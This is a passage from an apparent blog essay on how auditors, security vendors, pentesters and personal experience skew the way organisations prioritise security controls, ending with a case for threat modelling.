The tick-box monkeys themselves. They provide a useful function, and are so universally legislated and embedded in best practice that everyone has a few decades of experience being on the giving or receiving end of a financial audit. The priorities audit reports seem to drive are:

  • Vulnerabilities in financial systems. The whole audit hierarchy was created around financial controls, and so sticks close to financial systems when venturing into IT's space. Detailed and complex collusion possibilities will be discussed when approving payments, but the fact that you can reset anyone's password at the helpdesk is sometimes missed, and more advanced attacks like token hijacking are often ignored.
  • Audit house priorities. Audit houses get driven just like anyone else. While I wasn't around for Enron, the reverberations could still be felt years later when I worked at one. What's more, audit houses are increasingly finding revenue coming from consulting gigs and need to keep their smart people happy. This leads to external audit selling "add-ons" like identity management audits (sometimes, they're even incentivised to).
  • Auditor skills. The auditor you get could be an amazing business process auditor but useless when it comes to infosec, and next year it could be the other way around. It's equally possible with internal audit. Thus, the strengths of the auditor will determine where you get nailed the hardest.
  • The Rotation plan. This year system X, next year system Y. It doesn't mean system X has gotten better, just that they moved on. If you spend your year responding to the audit on system Y and ignore X, you'll miss vital stuff.
  • Known systems. External and internal auditors don't know IT's business in detail. There could be all sorts of critical systems (or pivot points) that are ignored because they weren't in the "flow of financial information" spreadsheet.
Vendors

Security vendors are the love-to-hate people in the infosec world. Thinking of them invokes pictures of greasy salesmen phoning your CIO to ask if your security chumps have even thought about network admission control (true story). On the other hand, if you've ever been a small team trying to secure a large org, you'll know you can't do it without automation and at some point you'll need to purchase some products. Their marketing and sales people get all over the place and end up driving controls; whether it's "management by in-flight magazine", an idea punted at a sponsored conference, or the result of a sales meeting.

But security vendors' prioritisation of controls is driven by:

  • New Problems. Security products that work eventually get deployed everywhere they're going to be deployed. They continue to bring in income, but the vendor needs a new bright shiny thing they can take to their existing market and sell. Thus, new problems become new scary things that they can use to push product. Think of the Gartner hype curve. Whatever they're selling, be it DLP, NAC, DAM, APT prevention or IPS: if your firewall works more like a switch and your passwords are all "P@55w0rd", then you've got other problems to focus on first.
  • Overinflated problems. Some problems really aren't as big as they're made out to be by vendors, but making them look big is a key part of the sell. Even vendors who don't mean to overinflate end up doing it just because they spend all day thinking of ways to justify (even legitimate) purchases.
  • Products as solutions. Installing a product designed to help with a problem isn't the same as fixing the problem, and vendors aren't great at seeing that (some are). Take patch management solutions: there are some really awesome, mature products out there, but if you can't work out where your machines are, how many there are, or get creds to them, then you've got a long way to go before that product starts solving the problem it's supposed to.
Pentesters

Every year around Black Hat Vegas/Pwn2Own/AddYourConfHere time, a flurry of media reports hits the public and some people go into panic mode. I remember the DNS bug, where all that was needed was for people to apply a patch, but which, due to the publicity around it, garnered a significant amount of interest from people who usually wouldn't, and probably shouldn't, have cared so much. But many pentesters trade on this publicity, and some pentesting companies use it instead of a marketing budget. That's not their only, or primary, motivation, and in the end things get fixed, new techniques are shared and the world is a better place. The cynical view, then, is that some of the motivations of vulnerability researchers, and what they end up prioritising, are:

  • New Attacks. This is somewhat similar to the vendors optimising for "new problems", but not quite the same. When Errata introduced Hamster at ToorCon '07, I heard tales of people swearing at them from the back. I wasn't there, but I imagine some of the calls were because Layer 2 attacks have been around and well known for over a decade now. Many of us ignored FireSheep for the same reason, even if it motivated the biggest moves to SSL yet. But vuln researchers and the scene aren't interested; it needs to be shiny, new and leet. This focus on the new, and the press it drives, has defenders running around trying to fix new problems when they haven't fixed the old ones.
  • Complex Attacks. Related to the above, a new attack can't be really basic to do well; it needs to involve considerable skill. When Mark Dowd released his highly complex Flash attack, he was rightly given much kudos. An XSS attack, on the other hand, was initially ignored by many. However, one led to a wide class of prevalent vulns, while the other requires you to be, well, Mark Dowd. This means some of the issues that should be obvious, that underpin core infrastructure, but that aren't sexy, don't get looked at.
  • Shiny Attacks. Some attacks are just really well presented and sexy. Barnaby Jack had an ATM spitting out cash and flashing "Jackpot"; that's cool, and it gets a room packed full of people to hear his talk. Hopefully it led to an improvement in the security of some of the ATMs he targeted, but the vulns he exploited were the kinds of things big banks had mostly resolved already, and how many people in the audience actually worked in ATM security? I'd be interested to see if the con budget from banks increased the year of his talk; even if it didn't, I suspect many a banker went to his talk instead of one that perhaps covered a more prevalent or relevant class of vulnerabilities their organisation may experience. Something Thinkst says much better here.
Individual Experience

Unfortunately, as human beings, our decisions are coloured by a bunch of things that cause us to make choices either influenced or defined by factors other than the reality we are faced with. A couple of these lead us to prioritising different security motives when decision making rests solely with one person:

  • Past Experience. Human beings develop through learning and consequences. When you were a child and put your hand on a stove hot plate, you got burned and didn't do it again. It's much the same every time you get burned by a security incident, or worse, internal political incident. There's nothing wrong with this, and it's why we value experience; people who've been burned enough times not to let mistakes happen again. However, it does mean time may be spent preventing a past wrong, rather than focusing on the most likely current wrong. For example, one company I worked with insisted on an overly burdensome set of controls to be placed between servers belonging to their security team and the rest of the company network. The reason for this was due to a previous incident years earlier, where one of these servers had been the source of a Slammer outbreak. While that network was never again a source of a virus outbreak, their network still got hit by future outbreaks from normal users, via the VPN, from business partners etc. In this instance, past experience was favoured over a comprehensive approach to the actual problem, not just the symptom.
  • New Systems. Usually, the time when the most budget is available to work on a system is during its initial deployment. This is equally true of security, and the mantra is for security to be built in at the beginning. Justifying a chunk of security work on the mainframe that's been working fine for the last 10 years, on the other hand, is much harder, and usually needs to hook into an existing project. The result is that it's easier to get security built into new projects than to force an organisation to make significant "security only" changes to existing systems. The consequence is that the older systems, which present the vulnerabilities pentesters know and love, get fixed less frequently.
  • Individual Motives. We're complex beings with all sorts of drivers and motivations; maybe you want to get home early to spend some time with your kids, maybe you want to impress Bob from Payroll. All sorts of things can lead to a decision that isn't necessarily the right security one. More relevantly however, security tends to operate in a fairly segmented manner: while some aspects are "common wisdom", others seem rarely discussed. For example, the way the CISO of Car Manufacturer A and the CISO of Car Manufacturer B set up their controls and choose their focus could be completely different, but beyond general industry chit-chat, there will be little detailed discussion of how they're securing integration to their dealership network. They rely on consultants, who've seen both sides, for that. Even then, one consultant may think that monitoring is the most important control at the moment, while another could think mobile security is it.
So What?

The result of all of this is that different companies and people push vastly different agendas. To figure out a strategic approach to security in your organisation, you need some objective, risk-based measurement that will help you secure things in an order that mirrors the actual risk to your environment. While it's still a black art, I believe Threat Modelling helps a lot here: a sufficiently comprehensive methodology, one that takes into account all of your infrastructure (or at least admits the existence of risk contributed by systems outside of a "most critical" list) and includes the valid perspectives above, tries to provide an objective version of reality that isn't as vulnerable to the individual biases described above.